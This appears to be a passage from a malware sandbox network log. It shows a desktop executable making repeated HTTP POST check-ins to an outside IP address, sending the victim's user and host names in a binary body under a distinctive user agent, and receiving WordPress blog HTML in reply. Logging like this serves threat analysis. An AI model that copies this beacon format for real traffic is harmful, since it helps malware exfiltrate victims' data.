11	192.168.2.4	49753	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:20.116741896 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:20.305181980 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:21.274584055 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:20 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:21.274991035 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:21.275083065 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:21.285012007 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:21.285587072 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:21.285692930 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:21.285736084 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:21.285875082 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:21.285902023 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:21.286083937 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:21.613500118 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:21.800147057 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:22.861709118 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:21 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:22.861901999 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:42:22.861953974 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:22.862129927 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:22.869213104 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:22.869570017 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:22.869750977 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:22.869832039 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:22.870012999 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:22.870075941 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:23.188582897 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:23.375848055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:24.372457981 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:23 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:24.372570038 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:24.372946024 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 26, 2024 04:42:24.373023033 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 26, 2024 04:42:24.373349905 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:24.391850948 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:24.398499012 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:24.398801088 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:24.398905039 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:24.399126053 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:24.705957890 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:24.893776894 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:25.840161085 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:24 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:25.840221882 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:25.840321064 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:25.850430012 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:25.850716114 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:25.850928068 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:25.851033926 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:25.851181984 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:25.851278067 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:25.851353884 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49757	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:26.179564953 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:26.369642973 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:27.333605051 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:26 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:27.334165096 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:42:27.334176064 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:27.334336996 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 26, 2024 04:42:27.334420919 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 26, 2024 04:42:27.334600925 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:27.348891020 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:27.349037886 CEST	166	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:27.349114895 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:27.349315882 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:27.665906906 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:27.852904081 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:28.809050083 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:27 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:28.809174061 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:42:28.809266090 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
